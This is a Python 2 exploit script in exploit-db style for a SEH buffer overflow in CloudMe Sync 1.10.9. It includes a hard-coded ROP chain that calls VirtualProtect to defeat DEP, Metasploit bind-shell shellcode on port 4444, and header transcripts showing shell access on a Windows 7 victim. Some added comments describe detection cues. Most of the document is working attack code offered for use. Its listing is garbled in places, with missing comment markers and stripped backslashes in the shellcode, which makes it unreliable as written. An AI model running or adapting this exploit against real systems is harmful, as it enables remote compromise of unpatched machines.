# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested Against Version: 1.10.9
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)
# for his work on the original exploit

# Bad Characters: x00
# SEH Offset: 2236
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll, libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll

# Victim Machine:
# C:>netstat -nao | find "8888"
# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640
# C:>tasklist | find "2640"
# CloudMe.exe 2640 Console 1 36,632 K

# Attacking Machine:
# root@kali:~/Desktop# python cloudme.py
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass
# [+] CloudMe Target IP> 192.168.12.4
# Sending buffer overflow to CloudMe Service
# Target Should be Running a Bind Shell on Port 4444!

# root@kali:~/Desktop# nc -nv 192.168.12.4 4444
# (UNKNOWN) [192.168.12.4] 4444 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.

# C:UsersjprescottoAppDataLocalProgramsCloudMeCloudMe>
# My register setup when VirtualProtect() is called (Defeat DEP) :
--
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

#!/usr/bin/python

import socket,struct

# Banner (Python 2 print statement); the "Attacking Machine" transcript in the
# header shows this as the first line of output before the target prompt.
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'

def create_rop_chain():

# Return the ROP chain as a string of packed little-endian DWORDs (struct '<I'),
# one per entry of rop_gadgets.
# The gadget list is mona.py output (corelan). Every address is hard-coded for
# the specific builds of Qt5Gui.dll, Qt5Core.dll, libstdc++-6.dll,
# libgcc_s_dw2-1.dll and libwinpthread-1.dll named in the header, and the chain
# works only because those modules load at fixed addresses on the tested
# install (header: "Tested Against Version: 1.10.9", Win7 SP1).
# What the chain does: loads the VirtualProtect() IAT pointer into ESI, seeds
# EBX (dwSize) and EDX (NewProtect 0x40) via NEG/INC/ADD so no 0x00 byte is
# needed (header: bad character x00), points ECX at a writable location and
# EBP at a "call esp" gadget, then PUSHAD RETN turns the register layout
# described in the header comment into the VirtualProtect call that disables
# DEP for the stack.
# Defender note: the title scopes the bug to versions before 1.11.0; the chain
# is tied to these exact module builds, so a rebuilt or relocated module set
# invalidates every address below.
# NOTE(review): as extracted, this body is unindented and the per-gadget
# annotation lines carry no '#' prefix, so the listing is not valid Python as
# shown; it is kept verbatim here.
rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61d1e7fe, POP ECX RETN [Qt5Gui.dll]
0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll]
0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll]
0x68c8ea5a, POP EBP RETN [Qt5Core.dll]
0x68d652e1, & call esp [Qt5Core.dll]
0x68fa7ca2, POP EDX RETN [Qt5Core.dll]
0xfffffdff, Value to negate, will become 0x00000201
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x68d52747, POP EBX RETN [Qt5Core.dll]
0xffffffff,
0x68f948bc, INC EBX RETN [Qt5Core.dll]
0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll]
0x68f9a472, POP EDX RETN [Qt5Core.dll]
0xffffffc0, Value to negate, will become 0x00000040
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x61f057ab, POP ECX RETN [Qt5Gui.dll]
0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll]
0x61dc14d1, POP EDI RETN [Qt5Gui.dll]
0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll]
0x61ba6245, POP EAX RETN [Qt5Gui.dll]
0x90909090, nop
0x61b45ea3, PUSHAD RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# Build the chain once at import time; it is spliced into the payload below.
rop_chain = create_rop_chain()



#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name Current Setting Required Description
# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444 yes The listen port
# RHOST no The target address
#msf payload(shell_bind_tcp) > generate -b 'x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai

# Second stage: Metasploit windows/shell_bind_tcp (355 bytes) encoded with
# x86/shikata_ga_nai to avoid the single bad character, exactly as the msf
# transcript above records (EXITFUNC thread, LPORT 4444 - which is why the
# header transcript connects with nc to port 4444 after the send).
# Defender note: shikata_ga_nai is a polymorphic encoder, so byte signatures on
# this blob are weak; the durable observable is behavioural - CloudMe.exe (the
# process owning the 8888 listener in the netstat/tasklist transcript) opening
# a new TCP listener on 4444 right after receiving one oversized request.
# NOTE(review): the escape sequences in these literals have lost their
# backslashes in extraction; they are reproduced here verbatim.
shellcode = ""
shellcode += "xdaxcfxbax8cx90x7bx70xd9x74x24xf4x5ex33"
shellcode += "xc9xb1x53x31x56x17x83xeexfcx03xdax83x99"
shellcode += "x85x1ex4bxdfx66xdex8cx80xefx3bxbdx80x94"
shellcode += "x48xeex30xdex1cx03xbaxb2xb4x90xcex1axbb"
shellcode += "x11x64x7dxf2xa2xd5xbdx95x20x24x92x75x18"
shellcode += "xe7xe7x74x5dx1ax05x24x36x50xb8xd8x33x2c"
shellcode += "x01x53x0fxa0x01x80xd8xc3x20x17x52x9axe2"
shellcode += "x96xb7x96xaax80xd4x93x65x3bx2ex6fx74xed"
shellcode += "x7ex90xdbxd0x4ex63x25x15x68x9cx50x6fx8a"
shellcode += "x21x63xb4xf0xfdxe6x2ex52x75x50x8ax62x5a"
shellcode += "x07x59x68x17x43x05x6dxa6x80x3ex89x23x27"
shellcode += "x90x1bx77x0cx34x47x23x2dx6dx2dx82x52x6d"
shellcode += "x8ex7bxf7xe6x23x6fx8axa5x2bx5cxa7x55xac"
shellcode += "xcaxb0x26x9ex55x6bxa0x92x1exb5x37xd4x34"
shellcode += "x01xa7x2bxb7x72xeexefxe3x22x98xc6x8bxa8"
shellcode += "x58xe6x59x44x50x41x32x7bx9dx31xe2x3bx0d"
shellcode += "xdaxe8xb3x72xfax12x1ex1bx93xeexa1x32x38"
shellcode += "x66x47x5exd0x2exdfxf6x12x15xe8x61x6cx7f"
shellcode += "x40x05x25x69x57x2axb6xbfxffxbcx3dxacx3b"
shellcode += "xddx41xf9x6bx8axd6x77xfaxf9x47x87xd7x69"
shellcode += "xebx1axbcx69x62x07x6bx3ex23xf9x62xaaxd9"
shellcode += "xa0xdcxc8x23x34x26x48xf8x85xa9x51x8dxb2"
shellcode += "x8dx41x4bx3ax8ax35x03x6dx44xe3xe5xc7x26"
shellcode += "x5dxbcxb4xe0x09x39xf7x32x4fx46xd2xc4xaf"
shellcode += "xf7x8bx90xd0x38x5cx15xa9x24xfcxdax60xed"
shellcode += "x1cx39xa0x18xb5xe4x21xa1xd8x16x9cxe6xe4"
shellcode += "x94x14x97x12x84x5dx92x5fx02x8exeexf0xe7"
shellcode += "xb0x5dxf0x2d"

# Target address is read interactively (Python 2 raw_input); no validation.
ip=raw_input('[+] CloudMe Target IP> ')

# Stack pivot and two ROP-NOP sleds, again fixed-address gadgets in Qt5Gui.dll /
# Qt5Core.dll; the pivot's ADD ESP,0D8C is what lands execution in the sled
# that leads into rop_chain. NOTE(review): the trailing gadget annotations on
# these three lines have no '#' prefix as extracted, so the lines are not valid
# Python as shown; kept verbatim.
stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300 RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50 RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
# Plain NOP pad between the chain and the shellcode (escape lost in extraction).
nop = "x90" * 20

# Payload layout: 2236 bytes of filler up to the SEH record (header: "SEH
# Offset: 2236"), the 4-byte pivot, then a region padded with 'B' to exactly
# 5600 bytes holding the two sleds, rop_chain, nop and shellcode - a single
# 7840-byte request in total.
# Defender note: one TCP send of that size to the 8888 service, dominated by
# repeated 'A'/'B' bytes, is the network-visible trigger.
payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))


# One TCP connection to the CloudMe Sync service on 8888, one send, no
# handshake or authentication beforehand, no response read, socket never
# closed. The transcript shows the service bound to 0.0.0.0:8888, i.e.
# reachable from any interface; limiting that listener to localhost or the host
# firewall reduces exposure until the fixed version (>= 1.11.0 per the title)
# is installed.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'